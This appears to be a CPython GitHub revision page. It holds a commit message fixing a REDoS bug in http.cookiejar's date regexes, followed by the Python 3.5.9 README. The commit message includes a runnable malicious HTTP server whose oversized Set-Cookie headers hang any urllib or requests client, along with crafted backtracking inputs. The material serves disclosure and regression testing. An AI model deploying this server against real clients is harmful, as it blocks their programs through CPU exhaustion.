https://github.com/python/cpython
Revision 55a6a16a46239a71b635584e532feb8b17ae7fdf authored by Victor Stinner on 03 April 2020, 01:37:32 UTC, committed by GitHub on 03 April 2020, 01:37:32 UTC
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups, the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.
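
A minimal sketch of that ambiguity, using the simplified pattern shown
earlier rather than the real LOOSE_HTTP_DATE_RE. The names AMBIGUOUS,
UNAMBIGUOUS and time_failed_match are made up for illustration, and the
input sizes are kept small so that even the slow case finishes quickly:

```python
import re
import time

# Simplified pattern from the text: three adjacent \s* can split a run of
# spaces in many different ways, and each split is tried before giving up.
AMBIGUOUS = re.compile(r"\d+-\w+-\d+(\s*\s*\s*)$")
# Hypothetical unambiguous equivalent: a single \s* owns every space.
UNAMBIGUOUS = re.compile(r"\d+-\w+-\d+(\s*)$")


def time_failed_match(pattern, n_spaces):
    """Return the seconds spent failing to match a string ending in '!'."""
    text = "1-c-1" + (" " * n_spaces) + "!"
    start = time.perf_counter()
    result = pattern.match(text)
    elapsed = time.perf_counter() - start
    assert result is None  # the trailing "!" prevents any match
    return elapsed


if __name__ == "__main__":
    for n in (50, 100, 200):
        slow = time_failed_match(AMBIGUOUS, n)
        fast = time_failed_match(UNAMBIGUOUS, n)
        print(f"{n:4d} spaces: ambiguous {slow:.6f}s, unambiguous {fast:.6f}s")
```

Both patterns accept and reject the same strings. Only the amount of
backtracking on a failed match should differ, and the gap should widen
as the run of spaces grows.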

A malicious server can respond with Set-Cookie headers that attack any
Python program which accesses it, e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will effectively never complete.
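
The choice of 65506 spaces can be checked with a little arithmetic. The
sketch below assumes each header is serialized as name, colon, space,
value, CRLF, and that the 65536 limit quoted in the server's comment
counts the whole line. header_line_length is a hypothetical helper:

```python
def make_set_cookie_value(n_spaces):
    # Same helper as in the server above.
    spaces = " " * n_spaces
    expiry = f"1-c-1{spaces}!"
    return f"b;Expires={expiry}"


def header_line_length(n_spaces):
    """Length in bytes of one 'Set-Cookie: <value>' line, including CRLF."""
    line = f"Set-Cookie: {make_set_cookie_value(n_spaces)}\r\n"
    return len(line.encode("latin-1"))


if __name__ == "__main__":
    # 12 ("Set-Cookie: ") + 10 ("b;Expires=") + 5 ("1-c-1")
    # + 65506 spaces + 1 ("!") + 2 (CRLF)
    print(header_line_length(65506))
```

Under those assumptions the line is exactly 65536 bytes long, so one
more space would push it over the limit.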

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.
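
A sketch of what such a check might look like. This is not the test
added by this commit: check_http2time_is_fast, the input size and the
5 second budget are assumptions made for illustration. It relies on
http.cookiejar.http2time, which falls back to LOOSE_HTTP_DATE_RE for
dates that are not strictly formatted:

```python
import time
from http.cookiejar import http2time


def check_http2time_is_fast(n_spaces=2000, budget_seconds=5.0):
    """Parse a malicious date and fail if it takes longer than the budget."""
    bad_time = "1-c-1" + (" " * n_spaces) + "!"
    start = time.perf_counter()
    # The trailing "!" makes the date unparseable, so None is expected.
    result = http2time(bad_time)
    elapsed = time.perf_counter() - start
    assert result is None
    # Arbitrary, generous budget: a fixed regex should finish far sooner,
    # while a regressed one would be expected to blow well past it.
    assert elapsed < budget_seconds, f"took {elapsed:.1f}s"
    return elapsed


if __name__ == "__main__":
    print(f"http2time rejected the input in {check_http2time_is_fast():.6f}s")
```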

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
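
The same kind of check can be sketched for the ISO parser through
http.cookiejar.iso2time, which uses ISO_DATE_RE. The helper name
check_iso2time is hypothetical:

```python
from http.cookiejar import iso2time


def check_iso2time(n_spaces=2000):
    """Reject a malicious string, then confirm a valid date still parses."""
    malicious = "444444" + (" " * n_spaces) + "A"
    # The trailing "A" makes the string unparseable, so None is expected.
    assert iso2time(malicious) is None
    # A well-formed ISO 8601 date should still yield seconds since the epoch.
    return iso2time("1994-02-03 14:15:29 -0100")


if __name__ == "__main__":
    print(check_iso2time())
```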

(cherry picked from commit 1b779bfb8593739b11cbb988ef82a883ec9d077e)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
1 parent ed07522
bpo-38804: Fix REDoS in http.cookiejar (GH-17157) (#17344)
README
This is Python version 3.5.9
============================

Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010,
2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019 Python Software
Foundation.  All rights reserved.

Python 3.x is a new version of the language, which is incompatible with the
2.x line of releases.  The language is mostly the same, but many details,
especially how built-in objects like dictionaries and strings work,
have changed considerably, and a lot of deprecated features have finally
been removed.
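
A few of these differences, as a small illustrative sketch (the variable
names are arbitrary, and this is not an exhaustive list):

```python
# Text and binary data are distinct types in Python 3.
text = "caf\u00e9"
data = text.encode("utf-8")
assert isinstance(text, str) and isinstance(data, bytes)
assert len(text) == 4 and len(data) == 5  # 4 characters, 5 UTF-8 bytes

# dict.keys() returns a live view rather than a list copy as in 2.x.
inventory = {"spam": 1}
keys = inventory.keys()
inventory["eggs"] = 2
assert sorted(keys) == ["eggs", "spam"]

# print is a function; / is true division and // is floor division.
print(7 / 2, 7 // 2)
```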

Using Python
------------

Installable Python kits, and information about using Python, are available at
`python.org`_.

.. _python.org: https://www.python.org/


Build Instructions
------------------

On Unix, Linux, BSD, OSX, and Cygwin:

    ./configure
    make
    make test
    sudo make install

This will install Python as python3.

You can pass many options to the configure script; run "./configure --help" to
find out more.  On OSX and Cygwin, the executable is called python.exe;
elsewhere it's just python.

On Mac OS X, if you have configured Python with --enable-framework, you should
use "make frameworkinstall" to do the installation.  Note that this installs
the Python executable in a place that is not normally on your PATH; you may
want to set up a symlink in /usr/local/bin.

On Windows, see PCbuild/readme.txt.

If you wish, you can create a subdirectory and invoke configure from there.
For example:

    mkdir debug
    cd debug
    ../configure --with-pydebug
    make
    make test

(This will fail if you *also* built at the top-level directory.
You should do a "make clean" at the top level first.)

To get an optimized build of Python, run "./configure --enable-optimizations"
before you run make.  This sets the default make targets up to enable Profile
Guided Optimization (PGO) and may be used to auto-enable Link Time Optimization
(LTO) on some platforms.  For more details, see the sections below.


Profile Guided Optimization
---------------------------

PGO takes advantage of recent versions of the GCC or Clang compilers.
When run, "make profile-opt" performs several steps.

First, the entire Python directory is cleaned of temporary files that
may have resulted from a previous compilation.

Then, an instrumented version of the interpreter is built, using suitable
compiler flags for each flavour. Note that this is just an intermediary
step and the binary resulting from this step is not good for real life
workloads, as it has profiling instructions embedded inside.

After this instrumented version of the interpreter is built, the Makefile
will automatically run a training workload. This is necessary in order to
profile the interpreter execution. Note also that any output, both stdout
and stderr, that may appear at this step is suppressed.

Finally, the last step is to rebuild the interpreter, using the information
collected in the previous one. The end result will be a Python binary
that is optimized and suitable for distribution or production installation.


Link Time Optimization
----------------------

Enabled via configure's --with-lto flag.  LTO takes advantage of the ability
of recent compiler toolchains to optimize across the otherwise arbitrary .o
file boundary when building final executables or shared libraries for
additional performance gains.


What's New
----------

We have a comprehensive overview of the changes in the "What's New in
Python 3.5" document, found at

    http://docs.python.org/3.5/whatsnew/3.5.html

For a more detailed change log, read Misc/NEWS (though this file, too,
is incomplete, and also doesn't list anything merged in from the 2.7
release under development).

If you want to install multiple versions of Python see the section below
entitled "Installing multiple versions".


Documentation
-------------

Documentation for Python 3.5 is online, updated daily:

    http://docs.python.org/3.5/

It can also be downloaded in many formats for faster access.  The documentation
is downloadable in HTML, PDF, and reStructuredText formats; the latter version
is primarily for documentation authors, translators, and people with special
formatting requirements.

If you would like to contribute to the development of Python, relevant
documentation is available at:

    http://docs.python.org/devguide/

For information about building Python's documentation, refer to Doc/README.txt.


Converting From Python 2.x to 3.x
---------------------------------

Python 2.6 and later contain features to help locate code that needs to
be changed, such as optional warnings when deprecated features are used, and
backported versions of certain key Python 3.x features.

A source-to-source translation tool, "2to3", can take care of the mundane task
of converting large amounts of source code.  It is not a complete solution but
is complemented by the deprecation warnings in 2.6.  See
http://docs.python.org/3.5/library/2to3.html for more information.


Testing
-------

To test the interpreter, type "make test" in the top-level directory.
The test set produces some output.  You can generally ignore the messages
about skipped tests due to optional features which can't be imported.
If a message is printed about a failed test or a traceback or core dump
is produced, something is wrong.

By default, tests are prevented from overusing resources like disk space and
memory.  To enable the resource-intensive tests as well, run "make testall".

IMPORTANT: If the tests fail and you decide to mail a bug report, *don't*
include the output of "make test".  It is useless.  Run the failing test
manually, as follows:

    ./python -m test -v test_whatever

(substituting the top of the source tree for '.' if you built in a different
directory).  This runs the test in verbose mode.


Installing multiple versions
----------------------------

On Unix and Mac systems, if you intend to install multiple versions of Python
using the same installation prefix (--prefix argument to the configure script),
you must take care that your primary python executable is not overwritten by
the installation of a different version.  All files and directories installed
using "make altinstall" contain the major and minor version and can thus live
side-by-side.  "make install" also creates ${prefix}/bin/python3 which refers
to ${prefix}/bin/pythonX.Y.  If you intend to install multiple versions using
the same prefix you must decide which version (if any) is your "primary"
version.  Install that version using "make install".  Install all other
versions using "make altinstall".

For example, if you want to install Python 2.6, 2.7 and 3.5 with 2.7 being the
primary version, you would execute "make install" in your 2.7 build directory
and "make altinstall" in the others.
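
To see which installation a given command actually runs, a small sketch
like the following may help. versioned_name is a hypothetical helper that
simply follows the pythonX.Y naming pattern described above:

```python
import sys


def versioned_name(version_info=sys.version_info):
    """Name of the versioned executable, following the pythonX.Y pattern."""
    return "python{}.{}".format(version_info[0], version_info[1])


if __name__ == "__main__":
    print(sys.executable)    # path of the interpreter that is running
    print(versioned_name())  # name "make altinstall" would use for it
```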


Issue Tracker and Mailing List
------------------------------

We're soliciting bug reports about all aspects of the language.  Fixes are also
welcome, preferably in unified diff format.  Please use the issue tracker:

    http://bugs.python.org/

If you're not sure whether you're dealing with a bug or a feature, use the
mailing list:

    python-dev@python.org

To subscribe to the list, use the mailman form:

    http://mail.python.org/mailman/listinfo/python-dev/


Proposals for enhancement
-------------------------

If you have a proposal to change Python, you may want to send an email to the
comp.lang.python or `python-ideas`_ mailing lists for initial feedback.  A Python
Enhancement Proposal (PEP) may be submitted if your idea gains ground.  All
current PEPs, as well as guidelines for submitting a new PEP, are listed at
http://www.python.org/dev/peps/.

.. _python-ideas: https://mail.python.org/mailman/listinfo/python-ideas/

Release Schedule
----------------

See PEP 478 for release details: http://www.python.org/dev/peps/pep-0478/


Copyright and License Information
---------------------------------

Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010,
2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019 Python Software
Foundation.  All rights reserved.

Copyright (c) 2000 BeOpen.com.  All rights reserved.

Copyright (c) 1995-2001 Corporation for National Research Initiatives.  All
rights reserved.

Copyright (c) 1991-1995 Stichting Mathematisch Centrum.  All rights reserved.

See the file "LICENSE" for information on the history of this software,
terms & conditions for usage, and a DISCLAIMER OF ALL WARRANTIES.

This Python distribution contains *no* GNU General Public License (GPL) code,
so it may be used in proprietary projects.  There are interfaces to some GNU
code but these are entirely optional.

All trademarks referenced herein are property of their respective holders.